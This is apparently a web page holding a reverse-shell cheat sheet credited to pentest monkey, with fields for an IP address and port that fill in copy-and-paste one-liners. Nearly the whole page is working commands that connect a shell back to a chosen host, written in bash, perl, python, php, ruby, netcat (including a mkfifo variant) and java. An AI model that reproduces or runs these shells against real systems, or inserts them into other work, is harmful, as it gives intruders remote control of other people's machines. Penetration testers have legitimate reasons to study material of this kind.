Reverse Shells
IP Address: Port:
All of the following reverse shells are originally from pentest monkey. The purpose of this post is to dynamically build these reference shells with your desired IP and port to make copy and paste quick and easy.
bash
bash -i >& /dev/tcp/{{USER_IP}}/{{USER_PORT}} 0>&1
perl
perl -e 'use Socket;$i="{{USER_IP}}";$p={{USER_PORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{USER_IP}}",{{USER_PORT}}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("{{USER_IP}}",{{USER_PORT}});exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("{{USER_IP}}",{{USER_PORT}}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
netcat
nc -e /bin/sh {{USER_IP}} {{USER_PORT}}
netcat 2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{USER_IP}} {{USER_PORT}} >/tmp/f
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{{USER_IP}}/{{USER_PORT}};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()